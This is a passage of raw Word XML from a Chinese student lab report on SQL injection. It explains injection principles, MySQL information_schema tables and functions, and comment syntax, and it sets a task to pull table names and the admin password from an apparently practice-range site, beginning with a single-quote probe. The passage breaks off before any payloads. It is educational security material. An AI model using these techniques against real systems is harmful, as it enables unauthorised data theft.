            <w:r w:rsidRPr="001858B4">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>1. 检索SQL注入相关资料，自学SQL注入基本方法</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DDDD80D" w14:textId="1C2D523D" w:rsidR="00125B21" w:rsidRPr="00A92EE6" w:rsidRDefault="001858B4" w:rsidP="00A92EE6">
            <w:pPr>
              <w:pStyle w:val="a7"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001858B4">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>2. 完成对特定网站的SQL注入以获取数据库信息</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00125B21" w14:paraId="2A589412" w14:textId="77777777" w:rsidTr="00A5242F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E894984" w14:textId="77777777" w:rsidR="00125B21" w:rsidRDefault="00125B21" w:rsidP="000464C0">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="num" w:pos="1140"/>
              </w:tabs>
              <w:rPr>
                <w:rFonts w:eastAsia="黑体"/>
                <w:bCs/>
                <w:color w:val="FF0000"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三、实验</w:t>
            </w:r>
            <w:r w:rsidR="00C47A2E">
              <w:rPr>
                <w:rFonts w:eastAsia="黑体" w:hint="eastAsia"/>
                <w:bCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>设计</w:t>
            </w:r>
            <w:r w:rsidR="00A2325E">
              <w:rPr>
                <w:rFonts w:eastAsia="黑体" w:hint="eastAsia"/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>（实验原理</w:t>
            </w:r>
            <w:r w:rsidR="00A2325E">
              <w:rPr>
                <w:rFonts w:eastAsia="黑体"/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidR="00F17314" w:rsidRPr="00564F3D">
              <w:rPr>
                <w:rFonts w:eastAsia="黑体" w:hint="eastAsia"/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>真值表、原理图</w:t>
            </w:r>
            <w:r w:rsidR="00C47A2E">
              <w:rPr>
                <w:rFonts w:eastAsia="黑体" w:hint="eastAsia"/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>等</w:t>
            </w:r>
            <w:r w:rsidRPr="00564F3D">
              <w:rPr>
                <w:rFonts w:eastAsia="黑体" w:hint="eastAsia"/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>）</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="45892412" w14:textId="1353752E" w:rsidR="00317B6C" w:rsidRPr="00317B6C" w:rsidRDefault="00317B6C" w:rsidP="00317B6C">
            <w:pPr>
              <w:pStyle w:val="a7"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00317B6C">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>1、实验原理</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03865514" w14:textId="77777777" w:rsidR="001B0DA1" w:rsidRDefault="001858B4" w:rsidP="00B744B1">
            <w:pPr>
              <w:pStyle w:val="a7"/>
            </w:pPr>
            <w:r w:rsidRPr="001858B4">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>任何SQL是操作数据库数据的结构化查询语言，网页的应用数据和后台数据库中的数据进行交互时会采用SQL。而SQL注入是将Web页面的原URL、表单域或数据包输入的参数，修改拼接成SQL语句，传递给Web服务器，进而传给数据库服务器</w:t>
            </w:r>
            <w:r w:rsidRPr="001858B4">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">以执行数据库命令。如Web应用程序的开发人员对用户所输入的数据或cookie等内容不进行过滤或验证(即存在注入点)就直接传输给数据库，就可能导致拼接的SQL被执行，获取对数据库的信息以及提权，发生SQL注入攻击。 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08072F7F" w14:textId="77777777" w:rsidR="00982306" w:rsidRDefault="00982306" w:rsidP="00C660C2">
            <w:pPr>
              <w:pStyle w:val="a7"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
              <w:rPr>
                <w:b/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1C85D223" w14:textId="288B6DFC" w:rsidR="00C660C2" w:rsidRPr="00C660C2" w:rsidRDefault="00C660C2" w:rsidP="00C660C2">
            <w:pPr>
              <w:pStyle w:val="a7"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
              <w:rPr>
                <w:b/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C660C2">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>2、</w:t>
            </w:r>
            <w:r w:rsidRPr="00C660C2">
              <w:rPr>
                <w:rFonts w:hint="cs"/>
                <w:b/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>产生注入漏洞条件</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54DB385E" w14:textId="77777777" w:rsidR="00C660C2" w:rsidRPr="00C660C2" w:rsidRDefault="00C660C2" w:rsidP="00B6784D">
            <w:pPr>
              <w:pStyle w:val="a7"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="10"/>
              </w:numPr>
              <w:ind w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:hint="cs"/>
              </w:rPr>
            </w:pPr>
            <w:r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参数用户可控</w:t>
            </w:r>
            <w:r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:</w:t>
            </w:r>
            <w:r w:rsidRPr="00C660C2">
              <w:rPr>
                <w:rFonts w:hint="cs"/>
              </w:rPr>
              <w:t>前端传给后端的参数内容是可以被用户控制的</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="790E5C11" w14:textId="77777777" w:rsidR="00C660C2" w:rsidRPr="00C660C2" w:rsidRDefault="00C660C2" w:rsidP="00B6784D">
            <w:pPr>
              <w:pStyle w:val="a7"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="10"/>
              </w:numPr>
              <w:ind w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:hint="cs"/>
              </w:rPr>
            </w:pPr>
            <w:r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参数带入数据库查询</w:t>
            </w:r>
            <w:r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:</w:t>
            </w:r>
            <w:r w:rsidRPr="00C660C2">
              <w:rPr>
                <w:rFonts w:hint="cs"/>
              </w:rPr>
              <w:t>传入的参数拼接到SQL语句,且带入数据库查询</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18570323" w14:textId="77777777" w:rsidR="0072145C" w:rsidRDefault="0072145C" w:rsidP="00982306">
            <w:pPr>
              <w:pStyle w:val="a7"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="36EEE3EC" w14:textId="5800234C" w:rsidR="00C660C2" w:rsidRPr="0072145C" w:rsidRDefault="0072145C" w:rsidP="00982306">
            <w:pPr>
              <w:pStyle w:val="a7"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:hint="cs"/>
                <w:b/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0072145C">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>3、</w:t>
            </w:r>
            <w:r w:rsidR="00C660C2" w:rsidRPr="0072145C">
              <w:rPr>
                <w:rFonts w:hint="cs"/>
                <w:b/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>与SQL注入相关知识点</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05AAB65F" w14:textId="7B94E74B" w:rsidR="00C660C2" w:rsidRPr="00C660C2" w:rsidRDefault="003E669A" w:rsidP="0072145C">
            <w:pPr>
              <w:pStyle w:val="a7"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:hint="cs"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>①</w:t>
            </w:r>
            <w:r w:rsidR="00C660C2" w:rsidRPr="00C660C2">
              <w:rPr>
                <w:rFonts w:hint="cs"/>
              </w:rPr>
              <w:t>在MYSQL5.0版本后,系统会默认在数据库中存放一个</w:t>
            </w:r>
            <w:r w:rsidR="00C660C2"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informa_schema</w:t>
            </w:r>
            <w:r w:rsidR="00C660C2" w:rsidRPr="00C660C2">
              <w:rPr>
                <w:rFonts w:hint="cs"/>
              </w:rPr>
              <w:t>的数据库,该库中需要记住三个表名:</w:t>
            </w:r>
            <w:r w:rsidR="00C660C2"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schemata,tables,columns;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="012301A1" w14:textId="77777777" w:rsidR="00C660C2" w:rsidRPr="00C660C2" w:rsidRDefault="00C660C2" w:rsidP="006502BE">
            <w:pPr>
              <w:pStyle w:val="a7"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8"/>
              </w:numPr>
              <w:ind w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:hint="cs"/>
              </w:rPr>
            </w:pPr>
            <w:r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schemata</w:t>
            </w:r>
            <w:r w:rsidRPr="00C660C2">
              <w:rPr>
                <w:rFonts w:hint="cs"/>
              </w:rPr>
              <w:t>表用来存放用户创建的所有数据库的库名,需要记住数据库库名的字段名为</w:t>
            </w:r>
            <w:r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schema_name</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="370229EC" w14:textId="77777777" w:rsidR="00C660C2" w:rsidRPr="00C660C2" w:rsidRDefault="00C660C2" w:rsidP="006502BE">
            <w:pPr>
              <w:pStyle w:val="a7"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8"/>
              </w:numPr>
              <w:ind w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:hint="cs"/>
              </w:rPr>
            </w:pPr>
            <w:r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tables</w:t>
            </w:r>
            <w:r w:rsidRPr="00C660C2">
              <w:rPr>
                <w:rFonts w:hint="cs"/>
              </w:rPr>
              <w:t>存放数据所有数据库名和表名,记住这两个字段名</w:t>
            </w:r>
            <w:r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table_schema</w:t>
            </w:r>
            <w:r w:rsidRPr="00C660C2">
              <w:rPr>
                <w:rFonts w:hint="cs"/>
              </w:rPr>
              <w:t>和</w:t>
            </w:r>
            <w:r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table_name</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="690F118F" w14:textId="4D65BFA5" w:rsidR="00C660C2" w:rsidRPr="00C660C2" w:rsidRDefault="00C660C2" w:rsidP="006502BE">
            <w:pPr>
              <w:pStyle w:val="a7"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8"/>
              </w:numPr>
              <w:ind w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:hint="cs"/>
              </w:rPr>
            </w:pPr>
            <w:r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columns</w:t>
            </w:r>
            <w:r w:rsidRPr="00C660C2">
              <w:rPr>
                <w:rFonts w:hint="cs"/>
              </w:rPr>
              <w:t>存放所有的数据库名,表名和列名,需要记住这三个字段名</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0221838E" w14:textId="4C6BC06C" w:rsidR="00C660C2" w:rsidRPr="00C660C2" w:rsidRDefault="006502BE" w:rsidP="006502BE">
            <w:pPr>
              <w:pStyle w:val="a7"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:hint="cs"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>②一些常用</w:t>
            </w:r>
            <w:r w:rsidR="00C660C2" w:rsidRPr="00C660C2">
              <w:rPr>
                <w:rFonts w:hint="cs"/>
              </w:rPr>
              <w:t>函数:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5AC08193" w14:textId="77777777" w:rsidR="00C660C2" w:rsidRPr="00C660C2" w:rsidRDefault="00C660C2" w:rsidP="00484CAD">
            <w:pPr>
              <w:pStyle w:val="a7"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="9"/>
              </w:numPr>
              <w:ind w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:hint="cs"/>
              </w:rPr>
            </w:pPr>
            <w:r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database()</w:t>
            </w:r>
            <w:r w:rsidRPr="00C660C2">
              <w:rPr>
                <w:rFonts w:hint="cs"/>
              </w:rPr>
              <w:t>:当前网站使用的数据库</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2637DDF1" w14:textId="77777777" w:rsidR="00C660C2" w:rsidRPr="00C660C2" w:rsidRDefault="00C660C2" w:rsidP="00484CAD">
            <w:pPr>
              <w:pStyle w:val="a7"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="9"/>
              </w:numPr>
              <w:ind w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:hint="cs"/>
              </w:rPr>
            </w:pPr>
            <w:r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version()</w:t>
            </w:r>
            <w:r w:rsidRPr="00C660C2">
              <w:rPr>
                <w:rFonts w:hint="cs"/>
              </w:rPr>
              <w:t>:当前MYSQL的版本</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="484A227E" w14:textId="77777777" w:rsidR="00C660C2" w:rsidRPr="00C660C2" w:rsidRDefault="00C660C2" w:rsidP="00484CAD">
            <w:pPr>
              <w:pStyle w:val="a7"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="9"/>
              </w:numPr>
              <w:ind w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:hint="cs"/>
              </w:rPr>
            </w:pPr>
            <w:r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user()</w:t>
            </w:r>
            <w:r w:rsidRPr="00C660C2">
              <w:rPr>
                <w:rFonts w:hint="cs"/>
              </w:rPr>
              <w:t>: 当前MYSQL用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F1A2199" w14:textId="04A7C7CA" w:rsidR="00C660C2" w:rsidRPr="00C660C2" w:rsidRDefault="00484CAD" w:rsidP="00484CAD">
            <w:pPr>
              <w:pStyle w:val="a7"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:hint="cs"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>③</w:t>
            </w:r>
            <w:r w:rsidR="00C660C2" w:rsidRPr="00C660C2">
              <w:rPr>
                <w:rFonts w:hint="cs"/>
              </w:rPr>
              <w:t>需要知道MYSQL注释符为:</w:t>
            </w:r>
            <w:r w:rsidR="00C660C2"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#</w:t>
            </w:r>
            <w:r w:rsidR="00C660C2" w:rsidRPr="00C660C2">
              <w:rPr>
                <w:rFonts w:hint="cs"/>
              </w:rPr>
              <w:t>或</w:t>
            </w:r>
            <w:r w:rsidR="00C660C2"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--</w:t>
            </w:r>
            <w:r w:rsidR="00C660C2"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空格</w:t>
            </w:r>
            <w:r w:rsidR="00C660C2" w:rsidRPr="00C660C2">
              <w:rPr>
                <w:rFonts w:hint="cs"/>
              </w:rPr>
              <w:t>或</w:t>
            </w:r>
            <w:r w:rsidR="00C660C2" w:rsidRPr="00C660C2">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="宋体"/>
                <w:color w:val="15A7A7"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>/**/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6FA865DC" w14:textId="49B0179A" w:rsidR="00C660C2" w:rsidRPr="00C660C2" w:rsidRDefault="00C660C2" w:rsidP="00C660C2">
            <w:pPr>
              <w:pStyle w:val="a7"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001B0DA1" w14:paraId="52CE7B8A" w14:textId="77777777" w:rsidTr="00A5242F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33546CA" w14:textId="77777777" w:rsidR="001B0DA1" w:rsidRDefault="001B0DA1" w:rsidP="001B0DA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四、实验过程或算法</w:t>
            </w:r>
            <w:r w:rsidR="00A2325E" w:rsidRPr="00564F3D">
              <w:rPr>
                <w:rFonts w:eastAsia="黑体" w:hint="eastAsia"/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidR="00A2325E" w:rsidRPr="00564F3D">
              <w:rPr>
                <w:rFonts w:eastAsia="黑体" w:hint="eastAsia"/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>关键步骤、核心代码</w:t>
            </w:r>
            <w:r w:rsidR="00A2325E">
              <w:rPr>
                <w:rFonts w:eastAsia="黑体" w:hint="eastAsia"/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>注解</w:t>
            </w:r>
            <w:r w:rsidR="00A2325E">
              <w:rPr>
                <w:rFonts w:eastAsia="黑体"/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>等</w:t>
            </w:r>
            <w:r w:rsidR="00A2325E" w:rsidRPr="00564F3D">
              <w:rPr>
                <w:rFonts w:eastAsia="黑体" w:hint="eastAsia"/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>）</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C4A575A" w14:textId="503DD92B" w:rsidR="00476003" w:rsidRDefault="00541616" w:rsidP="00476003">
            <w:pPr>
              <w:pStyle w:val="a7"/>
            </w:pPr>
            <w:r w:rsidRPr="00541616">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>对以下网站进行SQL注入：</w:t>
            </w:r>
            <w:hyperlink r:id="rId7" w:history="1">
              <w:r w:rsidRPr="00541616">
                <w:rPr>
                  <w:rStyle w:val="a9"/>
                </w:rPr>
                <w:t>http://rhiq8003.ia.aqlab.cn/</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00541616">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>完成以下信息的获取：数据库名称</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="00541616">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>数据库中的所有表的名称</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="00541616">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>每个表中的字段数量以及字段名</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="00541616">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>管理员用户密码</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00541616">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>最后总结如何对SQL注入攻击进行防范。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6FC13091" w14:textId="50384407" w:rsidR="004F42FF" w:rsidRDefault="004F42FF" w:rsidP="00476003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工具选择上，为了方便显示u</w:t>
            </w:r>
            <w:r>
              <w:t>rl</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>的更改，这里选择p</w:t>
            </w:r>
            <w:r>
              <w:t>ostman</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>工具</w:t>
            </w:r>
            <w:r w:rsidR="00FD0A7E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>。其中，</w:t>
            </w:r>
            <w:r w:rsidR="00340152">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>文章1号，其id直接显示在u</w:t>
            </w:r>
            <w:r w:rsidR="00340152">
              <w:t>rl</w:t>
            </w:r>
            <w:r w:rsidR="00340152">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>上，可以判断</w:t>
            </w:r>
            <w:hyperlink r:id="rId8" w:history="1">
              <w:r w:rsidR="00340152" w:rsidRPr="00D21393">
                <w:rPr>
                  <w:rStyle w:val="a9"/>
                </w:rPr>
                <w:t>http://rhiq8003.ia.aqlab.cn/?id=1</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00340152">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>为G</w:t>
            </w:r>
            <w:r w:rsidR="00340152">
              <w:t>ET</w:t>
            </w:r>
            <w:r w:rsidR="00340152">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>请求。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18EF3BFD" w14:textId="2067E01F" w:rsidR="007A20C3" w:rsidRDefault="004179E3" w:rsidP="001066F5">
            <w:pPr>
              <w:pStyle w:val="a7"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
              <w:rPr>
                <w:b/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00105D6F">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>1、</w:t>
            </w:r>
            <w:r w:rsidR="001066F5" w:rsidRPr="00105D6F">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>判断网站</w:t>
            </w:r>
            <w:r w:rsidR="006A23DE" w:rsidRPr="00105D6F">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>是</w:t>
            </w:r>
            <w:r w:rsidR="006A23DE" w:rsidRPr="00105D6F">
              <w:rPr>
                <w:rFonts w:hint="cs"/>
                <w:b/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>否存在注入漏洞</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C0DC88C" w14:textId="2E2894E0" w:rsidR="007A20C3" w:rsidRDefault="007A20C3" w:rsidP="001066F5">
            <w:pPr>
              <w:pStyle w:val="a7"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
              <w:rPr>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>利用单引号判断法，</w:t>
            </w:r>
            <w:r w:rsidR="00B32DC8">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>即u</w:t>
            </w:r>
            <w:r w:rsidR="00B32DC8">
              <w:rPr>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>rl</w:t>
            </w:r>
            <w:r w:rsidR="00B32DC8">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>最后添加一个引号，</w:t>
            </w:r>
            <w:hyperlink r:id="rId9" w:history="1">
              <w:r w:rsidR="00465049" w:rsidRPr="00D21393">
                <w:rPr>
                  <w:rStyle w:val="a9"/>
                  <w:bCs w:val="0"/>
                </w:rPr>
                <w:t>http://rhiq8003.ia.aqlab.cn/?id=1</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="001A18F2" w:rsidRPr="001A18F2">
              <w:rPr>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>'</w:t>
            </w:r>
            <w:r w:rsidR="00465049">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>，如果</w:t>
            </w:r>
            <w:r w:rsidR="008B175A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>页面显示</w:t>
            </w:r>
            <w:r w:rsidR="00734E12">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>，则无漏洞；否则存在注入漏洞。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3255CCF8" w14:textId="77777777" w:rsidR="00B32DC8" w:rsidRPr="007A20C3" w:rsidRDefault="00B32DC8" w:rsidP="001066F5">
            <w:pPr>
              <w:pStyle w:val="a7"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="004B81AE" w14:textId="325C77AC" w:rsidR="001B0DA1" w:rsidRPr="00105D6F" w:rsidRDefault="007A20C3" w:rsidP="001066F5">
            <w:pPr>
              <w:pStyle w:val="a7"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
              <w:rPr>
                <w:b/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidR="00E71C40" w:rsidRPr="00105D6F">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>存在何种漏洞</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56DBACA5" w14:textId="232FCD6F" w:rsidR="00B84D8C" w:rsidRDefault="00766728" w:rsidP="009710D5">
            <w:pPr>
              <w:pStyle w:val="a7"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>常见的漏洞</w:t>
            </w:r>
            <w:r w:rsidR="00CE69C2">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>分为两类</w:t>
            </w:r>
            <w:r w:rsidR="00707CB9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidR="002878D9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>一是字符类</w:t>
            </w:r>
            <w:r w:rsidR="0077602A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，二是数字类</w:t>
            </w:r>
            <w:r w:rsidR="007414B3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
            <w:r w:rsidR="00AE5C28">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>测试是否存在注入漏洞的类型也有很多，如</w:t>
            </w:r>
            <w:r w:rsidR="00AE5C28" w:rsidRPr="00AE5C28">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>And测试</w:t>
            </w:r>
            <w:r w:rsidR="00AE5C28">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>、Or</w:t>
            </w:r>
            <w:r w:rsidR="00AE5C28" w:rsidRPr="00AE5C28">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>测试</w:t>
            </w:r>
            <w:r w:rsidR="00AE5C28">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs w:val="0"/>
              </w:rPr>
